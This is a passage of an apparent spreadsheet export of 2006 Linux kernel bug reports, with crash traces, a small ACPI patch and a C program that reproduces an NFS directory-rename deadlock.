    <t>Most recent kernel where this bug did not occur: In most recent kernel, this bug occurs. Hardware Environment: PCI Bus Topology: [CPU] [CPU] [CPU] [CPU] | |BUS | | BUS --+--+---+--- --+--+--+------ | | [Root Bridge]*1-----[Root Bridge]*1 | | \ \ [Bridge] | [PCI-e slot] [PCI-e slot] | | [PCI-e slot] | \ | [PCI-e slot] | | [PCI Bridge] | \ | [PCI-X slot] | [PCI-X slot] *1: PCI Express Root Bridge. Problem Description: I could not get correct PCI Express BUS number from the structure of acpi_object_extra. I always get zero as BUS number regardless of BUS location. I found that there is incorrect comparison with _HID (PNP0A08) in acpi/events/evrgnini.c and PCI Express _BBN method always fail. Therefore, we get always get zero as PCI Express bus number. I suggest the following patch. --- linux-2.6.17.13.org/drivers/acpi/events/evrgnini.c 2006-09-09 12:23:25.000000000 +0900 +++ linux-2.6.17.13/drivers/acpi/events/evrgnini.c 2006-09-11 11:34:16.625000000 +0900 @@ -213,12 +213,12 @@ acpi_ev_pci_config_region_setup(acpi_han if (! (ACPI_STRNCMP (object_hID.value, PCI_ROOT_HID_STRING, - sizeof(PCI_ROOT_HID_STRING)) + sizeof(PCI_ROOT_HID_STRING))) || !(ACPI_STRNCMP (object_hID.value, PCI_EXPRESS_ROOT_HID_STRING, - sizeof(PCI_EXPRESS_ROOT_HID_STRING))))) + sizeof(PCI_EXPRESS_ROOT_HID_STRING)))) { /* Install a handler for this PCI root bridge */</t>
  </si>
  <si>
    <t>tsc skew for Intel T2500 cpu Dell Inspiron 6400</t>
  </si>
  <si>
    <t>2.6.18-rc4 and above</t>
  </si>
  <si>
    <t>2006-09-11 12:14 UTC</t>
  </si>
  <si>
    <t>2010-01-05 00:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc3 Distribution: Gentoo Linux 2006.1 Hardware Environment: Dell Inspiron 6400 Intel T2500 Cpu Software Environment: Gentoo Linux Problem Description: At startup, in dmesg, just after tsc synchronization, two messages concerning each cpu about tsc skew. Steps to reproduce: use the linux kernel 2.6.18-rc4 and above version.</t>
  </si>
  <si>
    <t>khvcd not stopped during suspend</t>
  </si>
  <si>
    <t>2.6.18-rc6, 2.6.17.10</t>
  </si>
  <si>
    <t>2006-09-13 03:26 UTC</t>
  </si>
  <si>
    <t>Michael Tautschnig</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: Debian Hardware Environment: PowerBook6,8 Software Environment: ? Problem Description: Enabling CONFIG_HVC_DRIVER=y CONFIG_HVC_RTAS=y Makes suspend-to-disk (using hibernate) not work anymore due to khvcd not stopping: kernel: Stopping tasks: ============================================================ kernel: stopping tasks timed out after 20 seconds (1 tasks remaining): kernel: khvcd kernel: Restarting tasks...&lt;6&gt; Strange, khvcd not stopped kernel: done Steps to reproduce: Enable CONFIG_HVC_RTAS and try to suspend; Usually, people probably won't use CONFIG_HVC_RTAS together on a system they suspend, but Debian has added it to their default powerpc config.</t>
  </si>
  <si>
    <t>oops on ipmi_msghandler removal for non ipmi systems</t>
  </si>
  <si>
    <t>2.6.17 and current git</t>
  </si>
  <si>
    <t>2006-09-13 04:39 UTC</t>
  </si>
  <si>
    <t>2006-10-05 05:24 UTC</t>
  </si>
  <si>
    <t>On a system *without* ipmi: - modprobe ipmi_si (it'll load also ipmi_msghandler) - the ipmi_si module returns of course -ENODEV - rmmod ipmi_msghandler - watch the kernel oopsing The cause of this bug is a forgotten step in the error path. The ipmi_si module never calls driver_unregister in his error path. A fix will be provided in the next comment :)</t>
  </si>
  <si>
    <t>hdaps.c inversion of each axis</t>
  </si>
  <si>
    <t>2006-09-13 06:31 UTC</t>
  </si>
  <si>
    <t>Michael Ruoss</t>
  </si>
  <si>
    <t>2009-05-28 07:23 UTC</t>
  </si>
  <si>
    <t>Frank Seidel</t>
  </si>
  <si>
    <t>On my thinkpad x41 the x axis were ok but the y axis were inverted. The kernel module only allows inversion of both axis at once. I will attach a patch which enhances the "inverse"-device to accept one out of 4 numbers: 0: no inversion 1: invert both axis 2: invert x-axis 3: invert y-axis</t>
  </si>
  <si>
    <t>Oops when running 'unusual' command against scsi tape device</t>
  </si>
  <si>
    <t>2.6.17.11 AMD64</t>
  </si>
  <si>
    <t>2006-09-13 07:15 UTC</t>
  </si>
  <si>
    <t>Martin Hardcastle</t>
  </si>
  <si>
    <t>2008-03-29 23:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian sarge (up-to-date) IA32 Hardware Environment: Dual Opteron 250. Adaptec AIC-7892A U160 SCSI card, HP DAT-72 tape drive, other SCSI devices on bus. Software Environment: Problem Description: I inadvertently typed (as a user) mf -f /dev/st0 setblk 10240 This gives the following oops Sep 13 12:47:32 hercules kernel: Unable to handle kernel paging request at ffff82bcbf200000 RIP: Sep 13 12:47:32 hercules kernel: &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: PGD 0 Sep 13 12:47:32 hercules kernel: Oops: 0000 [1] SMP Sep 13 12:47:32 hercules kernel: CPU 0 Sep 13 12:47:32 hercules kernel: Modules linked in: nls_iso8859_1 nls_cp437 vfat fat sg nfs ipt_LOG xt_limit xt_tcpudp xt_state ip_conntrack iptable_filter nfsd exportfs lockd sunrpc af_packet autofs4 capability commoncap ipv6 snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm snd_timer snd snd_page_alloc generic i810_audio ac97_codec soundcore reiserfs ip_tables x_tables powernow_k8 freq_table processor ide_generic amd74xx ext3 jbd mbcache usb_storage cpufreq_userspace floppy pcspkr hw_random i2c_amd8111 tsdev mousedev shpchp pci_hotplug evdev usbhid eth1394 ohci_hcd usbcore tg3 e100 mii ohci1394 w83627hf i2c_isa eeprom lm85 hwmon_vid i2c_amd756 i2c_core sbp2 ieee1394 psmouse ide_disk ide_cd ide_core st sr_mod cdrom sd_mod sata_sil libata aic7xxx scsi_transport_spi scsi_mod unix Sep 13 12:47:32 hercules kernel: Pid: 22344, comm: mf Not tainted 2.6.17.11 #1 Sep 13 12:47:32 hercules kernel: RIP: 0010:[&lt;ffffffff8010735a&gt;] &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: RSP: 0000:ffff81005674bcd8 EFLAGS: 00010006 Sep 13 12:47:32 hercules kernel: RAX: ffff82bcbf200000 RBX: ffff81003ec8ec00 RCX: 000000000000001e Sep 13 12:47:32 hercules kernel: RDX: ffff82bcbf200000 RSI: 0000000000000000 RDI: 00000007f0000000 Sep 13 12:47:32 hercules kernel: RBP: ffff81007ffc6300 R08: 0000000000000000 R09: 0000000000000400 Sep 13 12:47:32 hercules kernel: R10: 0000000000008000 R11: ffffffff80148950 R12: 0000000000001000 Sep 13 12:47:32 hercules kernel: R13: ffff810038139be8 R14: ffff8100490170c0 R15: ffff81003f77deb8 Sep 13 12:47:32 hercules kernel: FS: 00000000f793f000(0000) GS:ffffffff803e4000(0063) knlGS:00000000f7c662a0 Sep 13 12:47:32 hercules kernel: CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b Sep 13 12:47:32 hercules kernel: CR2: ffff82bcbf200000 CR3: 000000001b634000 CR4: 00000000000006e0 Sep 13 12:47:32 hercules kernel: Process mf (pid: 22344, threadinfo ffff81005674a000, task ffff81007c69a400) Sep 13 12:47:32 hercules kernel: Stack: 00000000000000d0 0000000000000000 0000000000000296 ffff8100490170c0 Sep 13 12:47:32 hercules kernel: ffff81007f493a40 0000000000001000 ffff810038139be8 ffffffff80145770 Sep 13 12:47:32 hercules kernel: ffff810038139be8 00000000ffffffea Sep 13 12:47:32 hercules kernel: Call Trace: &lt;ffffffff80145770&gt;{bio_free+64} &lt;ffffffff8800f75d&gt;{:scsi_mod:scsi_execute_async+653} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809d55a&gt;{:st:st_do_scsi+474} &lt;ffffffff8809d2f0&gt;{:st:st_sleep_done+0} Sep 13 12:47:32 hercules kernel: &lt;ffffffff880a2e20&gt;{:st:st_read+912} &lt;ffffffff80116c04&gt;{vma_merge+516} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8010b109&gt;{vfs_read+233} &lt;ffffffff80110743&gt;{sys_read+83} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80162e66&gt;{ia32_sysret+0} Sep 13 12:47:32 hercules kernel: Sep 13 12:47:32 hercules kernel: Code: 8b 00 f6 c4 40 74 04 48 8b 52 10 48 8b 4a 30 0f b7 51 28 65 Sep 13 12:47:32 hercules kernel: RIP &lt;ffffffff8010735a&gt;{kmem_cache_free+106} RSP &lt;ffff81005674bcd8&gt; Sep 13 12:47:32 hercules kernel: CR2: ffff82bcbf200000 Sep 13 12:47:32 hercules kernel: BUG: warning at drivers/scsi/st.c:2514/st_int_ioctl() Sep 13 12:47:32 hercules kernel: Sep 13 12:47:32 hercules kernel: Call Trace: &lt;ffffffff8809e458&gt;{:st:st_int_ioctl+136} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809f202&gt;{:st:st_flush+690} &lt;ffffffff80123f26&gt;{filp_close+70} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8013b1eb&gt;{put_files_struct+107} &lt;ffffffff80115145&gt;{do_exit+597} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80249177&gt;{do_unblank_screen+135} &lt;ffffffff8010aa42&gt;{do_page_fault+1922} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80123407&gt;{mempool_alloc+71} &lt;ffffffff80123407&gt;{mempool_alloc+71} Sep 13 12:47:32 hercules kernel: &lt;ffffffff801fbe7b&gt;{as_set_request+59} &lt;ffffffff80161df1&gt;{error_exit+0} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80148950&gt;{mempool_free_slab+0} &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80107357&gt;{kmem_cache_free+103} &lt;ffffffff80145770&gt;{bio_free+64} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8800f75d&gt;{:scsi_mod:scsi_execute_async+653} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809d55a&gt;{:st:st_do_scsi+474} &lt;ffffffff8809d2f0&gt;{:st:st_sleep_done+0} Sep 13 12:47:32 hercules kernel: &lt;ffffffff880a2e20&gt;{:st:st_read+912} &lt;ffffffff80116c04&gt;{vma_merge+516} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8010b109&gt;{vfs_read+233} &lt;ffffffff80110743&gt;{sys_read+83} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80162e66&gt;{ia32_sysret+0} Sep 13 12:47:32 hercules kernel: Unable to handle kernel paging request at ffff82bcbf200000 RIP: Sep 13 12:47:32 hercules kernel: &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: PGD 0 Sep 13 12:47:32 hercules kernel: Oops: 0000 [2] SMP Sep 13 12:47:32 hercules kernel: CPU 0 Sep 13 12:47:32 hercules kernel: Modules linked in: nls_iso8859_1 nls_cp437 vfat fat sg nfs ipt_LOG xt_limit xt_tcpudp xt_state ip_conntrack iptable_filter nfsd exportfs lockd sunrpc af_packet autofs4 capability commoncap ipv6 snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm snd_timer snd snd_page_alloc generic i810_audio ac97_codec soundcore reiserfs ip_tables x_tables powernow_k8 freq_table processor ide_generic amd74xx ext3 jbd mbcache usb_storage cpufreq_userspace floppy pcspkr hw_random i2c_amd8111 tsdev mousedev shpchp pci_hotplug evdev usbhid eth1394 ohci_hcd usbcore tg3 e100 mii ohci1394 w83627hf i2c_isa eeprom lm85 hwmon_vid i2c_amd756 i2c_core sbp2 ieee1394 psmouse ide_disk ide_cd ide_core st sr_mod cdrom sd_mod sata_sil libata aic7xxx scsi_transport_spi scsi_mod unix Sep 13 12:47:32 hercules kernel: Pid: 22344, comm: mf Not tainted 2.6.17.11 #1 Sep 13 12:47:32 hercules kernel: RIP: 0010:[&lt;ffffffff8010735a&gt;] &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: RSP: 0000:ffff81005674b828 EFLAGS: 00010006 Sep 13 12:47:32 hercules kernel: RAX: ffff82bcbf200000 RBX: ffff81003ec8ec00 RCX: 000000000000001e Sep 13 12:47:32 hercules kernel: RDX: ffff82bcbf200000 RSI: 0000000000000000 RDI: 00000007f0000000 Sep 13 12:47:32 hercules kernel: RBP: ffff81007ffc6300 R08: 0000000000000000 R09: 0000000000000400 Sep 13 12:47:32 hercules kernel: R10: 0000000000000003 R11: ffffffff80148950 R12: 0000000000001000 Sep 13 12:47:32 hercules kernel: R13: ffff810038139d08 R14: ffff81005c2cedc0 R15: ffff81003f77deb8 Sep 13 12:47:32 hercules kernel: FS: 00000000f793f000(0000) GS:ffffffff803e4000(0000) knlGS:00000000f70b0460 Sep 13 12:47:32 hercules kernel: CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b Sep 13 12:47:32 hercules kernel: CR2: ffff82bcbf200000 CR3: 0000000032370000 CR4: 00000000000006e0 Sep 13 12:47:32 hercules kernel: Process mf (pid: 22344, threadinfo ffff81005674a000, task ffff81007c69a400) Sep 13 12:47:32 hercules kernel: Stack: 00000000000000d0 0000000000000000 0000000000000296 ffff81005c2cedc0 Sep 13 12:47:32 hercules kernel: ffff81007f493a40 0000000000001000 ffff810038139d08 ffffffff80145770 Sep 13 12:47:32 hercules kernel: ffff810038139d08 00000000ffffffea Sep 13 12:47:32 hercules kernel: Call Trace: &lt;ffffffff80145770&gt;{bio_free+64} &lt;ffffffff8800f75d&gt;{:scsi_mod:scsi_execute_async+653} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80164368&gt;{cond_resched+56} &lt;ffffffff8809d55a&gt;{:st:st_do_scsi+474} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809d2f0&gt;{:st:st_sleep_done+0} &lt;ffffffff8809ea7f&gt;{:st:st_int_ioctl+1711} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809f202&gt;{:st:st_flush+690} &lt;ffffffff80123f26&gt;{filp_close+70} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8013b1eb&gt;{put_files_struct+107} &lt;ffffffff80115145&gt;{do_exit+597} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80249177&gt;{do_unblank_screen+135} &lt;ffffffff8010aa42&gt;{do_page_fault+1922} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80123407&gt;{mempool_alloc+71} &lt;ffffffff80123407&gt;{mempool_alloc+71} Sep 13 12:47:32 hercules kernel: &lt;ffffffff801fbe7b&gt;{as_set_request+59} &lt;ffffffff80161df1&gt;{error_exit+0} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80148950&gt;{mempool_free_slab+0} &lt;ffffffff8010735a&gt;{kmem_cache_free+106} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80107357&gt;{kmem_cache_free+103} &lt;ffffffff80145770&gt;{bio_free+64} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8800f75d&gt;{:scsi_mod:scsi_execute_async+653} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8809d55a&gt;{:st:st_do_scsi+474} &lt;ffffffff8809d2f0&gt;{:st:st_sleep_done+0} Sep 13 12:47:32 hercules kernel: &lt;ffffffff880a2e20&gt;{:st:st_read+912} &lt;ffffffff80116c04&gt;{vma_merge+516} Sep 13 12:47:32 hercules kernel: &lt;ffffffff8010b109&gt;{vfs_read+233} &lt;ffffffff80110743&gt;{sys_read+83} Sep 13 12:47:32 hercules kernel: &lt;ffffffff80162e66&gt;{ia32_sysret+0} Sep 13 12:47:32 hercules kernel: Sep 13 12:47:32 hercules kernel: Code: 8b 00 f6 c4 40 74 04 48 8b 52 10 48 8b 4a 30 0f b7 51 28 65 Sep 13 12:47:32 hercules kernel: RIP &lt;ffffffff8010735a&gt;{kmem_cache_free+106} RSP &lt;ffff81005674b828&gt; Sep 13 12:47:32 hercules kernel: CR2: ffff82bcbf200000 Sep 13 12:47:32 hercules kernel: &lt;1&gt;Fixing recursive fault but reboot is needed! The tape drive is then stuck (with a dead mf process) and reboot is needed. mf is the LaTeX metafont program: i.e. clearly it shouldn't do anything remotely sensible when applied to a tape device. Equally clearly it shouldn't give a kernel oops. Steps to reproduce: install mf (-: run command as above. I have not tried reverting to older kernels as the machine is a server...</t>
  </si>
  <si>
    <t>Deadlock in vfs_rename_dir</t>
  </si>
  <si>
    <t>2006-09-21 10:58 UTC</t>
  </si>
  <si>
    <t>Ranieri Romera</t>
  </si>
  <si>
    <t>2006-10-21 20:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: RedHat AS 4 Hardware Environment: Dell PowerEdge 6850, QUAD 3,2GHZ HT , 8GB RAM, 5 SCSI disks 146 GB 15k RPM. Software Environment: RH AS 4 with kernel 2.6.17.11 Problem Description: We have several processes hang in "D" (disk wait) state forever. That way, we cannot strace, gdb, pstack them to know what they were doing or where they were. It is a race condition between two processes renaming directories on a NFS volume. Assuming the following directory structure: "/nfs/a/b/c", where "/nfs" is mounted on a NFS volume... Process 1 tries to rename "/nfs/a/b/c" to "/nfs/a/d" at the same time that process 2 (in the second server) is trying to rename "/nfs/a/b" to "/nfs/a/d". Process 1 may hang. This error occiurs if the 2 processes running in same server, too. For more detail see: http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=115868947321633&amp;w=2 http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=115876518005796&amp;w=2 Steps to reproduce: /********************************** renamedir This program can be used to reproduce the deadlock in vfs_rename_dir, kernel 2.6.17 Instructions: 1. Mount a NFS volume from two servers (e.g. /nfs) 2. Create a directory (e.g. testdir) in this volume 3. In the first server, run 'renamedir -p /nfs/testdir' 4. In the second server, run 'renamedir -p /nfs/testdir -c' Wait for a while. The process in the first server should cause a deadlock in the VFS and stuck in D state. Fernando Soto - f.soto () terra ! com ! br - 20/Sep/2006 Terra Networks Brasil S/A *********************************/ #include &lt;stdio.h&gt; #include &lt;sys/stat.h&gt; #include &lt;sys/types.h&gt; #include &lt;unistd.h&gt; #include &lt;stdlib.h&gt; #include &lt;errno.h&gt; void usage(void) { fprintf(stderr,"renamedir -p &lt;path&gt; [-c]\n"); exit(1); } int main(int argc, char *argv[]) { int test_case = 0; char source[FILENAME_MAX]; char target[FILENAME_MAX]; const char *p1 = NULL; int i; // read options while ((i = getopt(argc, argv, "p:c")) != -1) { switch (i) { case 'c': test_case = 1; break; case 'p': p1 = optarg; break; } } if (!p1) { usage(); } // create test environment snprintf(target,sizeof(target),"%s/b",p1); if (mkdir(target,0755) == -1 &amp;&amp; errno != EEXIST) { fprintf(stderr,"Could not create dir %s: %s\n",target,strerror(errno)); exit(1); } snprintf(target,sizeof(target),"%s/b/e",p1); if (mkdir(target,0755) == -1 &amp;&amp; errno != EEXIST) { fprintf(stderr,"Could not create dir %s: %s\n",target,strerror(errno)); exit(1); } snprintf(target,sizeof(target),"%s/b/c",p1); if (mkdir(target,0755) == -1 &amp;&amp; errno != EEXIST) { fprintf(stderr,"Could not create dir %s: %s\n",target,strerror(errno)); exit(1); } snprintf(target,sizeof(target),"%s/b/c/f",p1); if (mkdir(target,0755) == -1 &amp;&amp; errno != EEXIST) { fprintf(stderr,"Could not create dir %s: %s\n",target,strerror(errno)); exit(1); } // prepare test cases if (test_case) { snprintf(source,sizeof(target),"%s/b",p1); snprintf(target,sizeof(target),"%s/d",p1); } else { snprintf(source,sizeof(target),"%s/b/c",p1); snprintf(target,sizeof(target),"%s/d",p1); } // test loop while (1) { rename(source,target); rename(target,source); } }</t>
  </si>
  <si>
    <t>aic94xx driver locks up on IBM x366 with Calgary IOMMU enabled</t>
  </si>
  <si>
    <t>2006-09-21 18:01 UTC</t>
  </si>
  <si>
    <t>2006-10-24 04:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: Ubuntu 6.06 Hardware Environment: IBM x366, 4x 3.16GHz Xeon, 8G RAM, aic94xx SAS controller, 6x 36G SAS disks, Calgary IOMMU Software Environment: netbooted Ubuntu mutant. Problem Description: aic94xx driver NMIs the system if calgary iommu is enabled. Steps to reproduce: 1. Clone linux-2.6 and add in scsi-misc, scsi-rc-fixes and aic94xx from git.kernel.org. 2. Build a netbootable "allmodconfig" kernel with attached config file. 3. Calgary IOMMU code activates 4. Subsequent loading of the aic94xx driver causes the service processor to log a PCI SERR with a split completion timeout, followed by an NMI, followed by a reboot. Note that disabling the Calgary IOMMU for the bus that the SAS controller is connected to (either via kconfig or iommu=none or calgary=disable=1) will make the problem go away.</t>
  </si>
  <si>
    <t>Save Configuration to an Alternate File: backup file written one directory level beyond</t>
  </si>
  <si>
    <t>2006-09-22 02:03 UTC</t>
  </si>
  <si>
    <t>Sebastian Kemper</t>
  </si>
  <si>
    <t>2006-10-08 12:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.17.x Distribution: "Save Configuration to an Alternate File": backup file written one directory level beyond Hardware Environment:x68 Software Environment:Gentoo Linux Problem Description:When one saves the configuration a backup file is written called &lt;name&gt;.old. E.g. kernel is in /usr/src and you save the config to "../kconfig" the backup file is "/usr/src/kconfig.old". Not with 2.6.18: the backup file is "/usr/kconfig.old". It use "make menuconfig", didn't try xconfig or gconfig for instance. Steps to reproduce:</t>
  </si>
  <si>
    <t>dbench triggered oops during multi-threaded operation</t>
  </si>
  <si>
    <t>2006-09-22 08:39 UTC</t>
  </si>
  <si>
    <t>2008-05-03 08:36 UTC</t>
  </si>
  <si>
    <t>Steps to reproduce: dbench -t 10 10 dbentch -t 10 1 will not produce the problem. Here's the v9fs trace output around the error: -- v9fs_dir_release (965): fidopen: 1 v9f-&gt;fid: 4 -- v9fs_t_clunk (965): fid 4 -- v9fs_remove (1016): inode: c000000000b642d0 dentry: c0000000008275f0 rmdir: 0 -- v9fs_fid_lookup (1016): dentry: filler.000 (c0000000008275f0) -- v9fs_t_remove (1016): fid 31 -- v9fs_remove (971): inode: c000000007b05550 dentry: c00000000086ab60 rmdir: 1 -- v9fs_fid_lookup (971): dentry: clients (c00000000086ab60) -- v9fs_t_remove (971): fid 0 -- v9fs_fid_lookup (1014): dentry: tmp (c000000007234c48) -- v9fs_vfs_getattr (1014): dentry: c000000007234c48 -- v9fs_t_stat (1014): fid 1 -- v9fs_dir_release (1015): inode: c000000000b64550 filp: c0000000007d26a8 fid: 16 -- v9fs_dir_release (1015): fidopen: 1 v9f-&gt;fid: 16 -- v9fs_t_clunk (1015): fid 16 -- v9fs_dentry_delete (965): dentry: filler.000 (c000000000aa9f00) -- v9fs_dentry_release (965): dentry: filler.000 (c000000000aa9f00) -- v9fs_dentry_delete (965): dentry: client0 (c000000000aa9c48) -- v9fs_dentry_release (965): dentry: client0 (c000000000aa9c48) -- v9fs_dir_readdir (1016): name client9 -- v9fs_t_read (1016): fid 6 offset 0x85x count 0x2000 -- v9fs_remove (971): remove fails: d:&amp;#65533; -- v9fs_dir_release (971): inode: c000000007716a50 filp: c000000000913288 fid: 2 -- v9fs_dir_release (971): fidopen: 1 v9f-&gt;fid: 2 -- v9fs_t_clunk (971): fid 2 -- v9fs_remove (1009): inode: c000000007b05050 dentry: c000000000aeaa78 rmdir: 1 -- v9fs_fid_lookup (1009): dentry: client2 (c000000000aeaa78) -- v9fs_t_remove (1009): fid 13 10 20 0.30 MB/sec cleanup 12 sec -- v9fs_fid_lookup (1015): dentry: tmp (c000000007234c48) -- v9fs_vfs_getattr (1015): dentry: c000000007234c48 -- v9fs_t_stat (1015): fid 1 -- v9fs_dir_release (1016): inode: c000000000b642d0 filp: c0000000071a66a8 fid: 6 -- v9fs_dir_release (1016): fidopen: 1 v9f-&gt;fid: 6 -- v9fs_t_clunk (1016): fid 6 -- v9fs_dentry_delete (971): dentry: filler.000 (c000000000aa96d8) -- v9fs_dentry_release (971): dentry: filler.000 (c000000000aa96d8) -- v9fs_dentry_delete (971): dentry: client6 (c000000000aa97c0) -- v9fs_dentry_release (971): dentry: client6 (c000000000aa97c0) -- v9fs_dir_release (1009): inode: c000000007b05550 filp: c00000000790d7b0 fid: 35 -- v9fs_dir_release (1009): fidopen: 1 v9f-&gt;fid: 35 -- v9fs_t_clunk (1009): fid 35 -- v9fs_remove (1010): inode: c000000007b05050 dentry: c000000000827508 rmdir: 1 -- v9fs_fid_lookup (1010): dentry: client3 (c000000000827508) -- v9fs_t_remove (1010): fid 15 -- v9fs_fid_lookup (1016): dentry: tmp (c000000007234c48) -- v9fs_vfs_getattr (1016): dentry: c000000007234c48 -- v9fs_t_stat (1016): fid 1 -- v9fs_dir_release (1010): inode: c000000007b05550 filp: c000000000851ee8 fid: 36 -- v9fs_dir_release (1010): fidopen: 1 v9f-&gt;fid: 36 -- v9fs_t_clunk (1010): fid 36 -- v9fs_remove (967): inode: c000000007b05550 dentry: c00000000086ab60 rmdir: 1 -- v9fs_fid_lookup (967): dentry: clients (c00000000086ab60) Unable to handle kernel paging request for data at address 0x6b6b6b6b6b6b6b8b Faulting instruction address: 0xc0000000001a7fb4 Oops: Kernel access of bad area, sig: 11 [#1] SMP NR_CPUS=32 NUMA Modules linked in: NIP: C0000000001A7FB4 LR: C0000000001A7FA8 CTR: C000000000215FB0 REGS: c00000000744b940 TRAP: 0300 Not tainted (2.6.18-systemsim) MSR: 9000000000009032 &lt;EE,ME,IR,DR&gt; CR: 48008424 XER: 00000000 DAR: 6B6B6B6B6B6B6B8B, DSISR: 0000000040000000 TASK = c000000007f0b040[967] 'dbench' THREAD: c000000007448000 CPU: 0 GPR00: C0000000001A7FA8 C00000000744BBC0 C00000000046F530 6B6B6B6B6B6B6B6B GPR04: 9000000030001032 FFFFFFFFFFFFFFFF 0000000000000001 C0000000003AE77C GPR08: C000000000456A00 C0000000003B0B38 C000000000495210 C0000000004A1C7C GPR12: C00000000744B720 C0000000003A7080 00000000100D0000 00000000100DBC08 GPR16: 00000000100D0000 00000000100A0000 0000000000000000 00000000100D0000 GPR20: 0000000010000000 00000000FF92CF18 00000000000003C4 0000000010017178 GPR24: 00000000FF92CF1C 00000000FF92D328 C0000000004B2A60 C000000007450930 GPR28: 6B6B6B6B6B6B6B6B C000000007B05050 C0000000003DC360 C00000000086AB60 NIP [C0000000001A7FB4] .v9fs_remove+0x74/0x1e0 LR [C0000000001A7FA8] .v9fs_remove+0x68/0x1e0 Call Trace: [C00000000744BBC0] [C0000000001A7FA8] .v9fs_remove+0x68/0x1e0 (unreliable) [C00000000744BC70] [C0000000000D4988] .vfs_rmdir+0xf8/0x130 [C00000000744BD00] [C0000000000D7D14] .do_rmdir+0xc4/0x170 [C00000000744BE30] [C00000000000861C] syscall_exit+0x0/0x40 Instruction dump: 7920efe3 408200b8 ebbf0010 7fa3eb78 4800417d 60000000 7c7b1b78 7fe3fb78 48004e3d 60000000 7c7c1b79 41820138 &lt;ebfc0022&gt; 2f9f0000 419c00e4 7f63db78 &lt;5&gt;-- v9fs_dir_release (967): inode: c000000007716550 filp: c0000000077c58b8 fi d: 17 -- v9fs_dir_release (967): fidopen: 1 v9f-&gt;fid: 17 -- v9fs_t_clunk (967): fid 17 -- v9fs_dentry_delete (967): dentry: filler.000 (c000000000827a78) -- v9fs_dentry_release (967): dentry: filler.000 (c000000000827a78) -- v9fs_dentry_delete (967): dentry: client2 (c000000000aeaa78) -- v9fs_dentry_release (967): dentry: client2 (c000000000aeaa78) It seems to be a race condition on how we deal with some of the data structures within meta-data operations. I believe we are not locking and not being as paranoid as we should be about the potential for state to change underneath us.</t>
  </si>
  <si>
    <t>p4-clockmod reports wrong MHz in /proc/cpuinfo desktop P4</t>
  </si>
  <si>
    <t>2006-09-22 11:19 UTC</t>
  </si>
  <si>
    <t>2008-07-05 04:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: This always occurs since 2.6.16. No idea about earlier versions. Distribution: Gentoo. Verified bug with vanilla kernel. Bug was originally filed at: http://bugs.gentoo.org/show_bug.cgi?id=141234 Possibly related: Bug 6367 Hardware Environment: Dell Dimension 8100 Pentium 4 1300 MHz w/ RDRAM from mid-2001 Software Environment: N/A Problem Description: p4-clockmod produces wrong MHz statistics in /proc/cpuinfo Simple benchmark with Perl script adding 1000s of integers shows that the frequency scaling works correctly and that the CPU is not being over-clocked. Steps to reproduce: #### (1) without p4-clockmod loaded: # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 0 model name : Intel(R) Pentium(R) 4 CPU 1300MHz stepping : 7 cpu MHz : 1285.413 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 2573.13 #### (2) with p4-clockmod loaded: # cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 525000 787500 1050000 1312500 1575000 1837500 2100000 # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 0 model name : Intel(R) Pentium(R) 4 CPU 1300MHz stepping : 7 cpu MHz : 2100.000 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 2573.13</t>
  </si>
  <si>
    <t>acpi_cpufreq causes 'swsusp' to fail</t>
  </si>
  <si>
    <t>2006-09-22 13:20 UTC</t>
  </si>
